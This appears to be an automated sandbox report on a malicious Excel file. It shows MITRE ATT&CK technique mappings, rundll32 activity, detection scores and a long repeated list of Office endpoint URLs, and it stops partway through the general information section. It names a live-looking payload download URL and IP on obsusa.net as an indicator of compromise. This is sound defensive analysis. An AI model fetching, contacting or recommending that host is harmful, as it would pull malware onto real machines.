Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000001.00000002.266502893.0000000000A20000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000002.266502893.0000000000A20000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000001.00000002.266502893.0000000000A20000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000001.00000002.266502893.0000000000A20000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e1df57de_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
obsusa.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://obsusa.net/chemgrcr.dll2%VirustotalBrowse
https://obsusa.net/chemgrcr.dll0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
obsusa.net
170.249.236.47
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://obsusa.net/chemgrcr.dlle1df57de_by_Libranalysis.xlsfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.diagnosticssdf.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
    high
    https://login.microsoftonline.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
      high
      https://shell.suite.office.com:1443CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
          high
          https://autodiscover-s.outlook.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
              high
              https://cdn.entity.CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                    high
                    https://powerlift.acompli.netCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                      high
                      https://cortana.aiCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                high
                                https://api.aadrm.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                      high
                                      https://cr.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                            high
                                            https://graph.ppe.windows.netCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                            high
                                                            https://graph.windows.netCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                high
                                                                                                https://api.office.netCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.CDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeCDE88565-44BA-40AC-8A9E-1CA847469122.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  170.249.236.47
                                                                                                                                                  obsusa.netUnited States
                                                                                                                                                  63410PRIVATESYSTEMSUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:403717
                                                                                                                                                  Start date:04.05.2021
                                                                                                                                                  Start time:10:56:42
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 4m 55s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:e1df57de_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:25
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
